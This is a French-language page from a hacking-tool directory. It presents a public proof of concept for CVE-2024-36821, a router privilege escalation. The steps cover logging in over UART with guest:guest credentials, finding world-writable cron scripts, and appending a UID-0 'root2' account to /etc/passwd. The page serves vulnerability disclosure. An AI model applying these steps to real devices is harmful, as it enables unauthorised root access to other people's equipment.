Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/ivanglinkin/cve-2024-36821
Sécurité des Systèmes EmbarquésEscalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionSécurité Matériel et IoT
GitHubivanglinkin/cve-2024-36821

CVE-2024-36821

La référence publique qui contient les informations minimales requises pour la vulnérabilité couverte par CVE-2024-36821.

Voir le dépôt
3il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-36821

La référence publique contenant les informations minimales requises pour la vulnérabilité couverte par CVE-2024-36821

La vidéo originale avec la preuve de concept se trouve sur la vidéo -> https://www.youtube.com/watch?v=6vHno0ik7JY

La preuve de concept :

  1. Connectez-vous au routeur via une connexion UART

  2. En utilisant les identifiants guest:guest, connectez-vous au système

  3. En utilisant la commande find / -perm -777 -type f 2>/dev/null, trouvez les fichiers avec les permissions lecture-écriture-exécution :

    root@kitploit:~
    1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
    2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
    3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
    4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
    5. /tmp/cron/cron.everyminute/conntrack_collector.sh
    
    Screenshot 2024-06-10 at 20 00 50
  4. Vérifiez le propriétaire avec la commande ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh

  5. Générez le mot de passe avec la commande openssl passwd Abracadabra

  6. Éditez /tmp/cron/cron.everyminute/conntrack_collector.sh, en ajoutant à la fin le nouveau mot de passe généré :

    root@kitploit:~
    echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
    
    Screenshot 2024-06-10 at 20 05 05
  7. Attendez une minute

  8. Changez d'utilisateur vers root2 avec la commande suivante

    root@kitploit:~
    / $ su root2
    Password: Abracadabra
    ~ #
    
Télécharger l’outil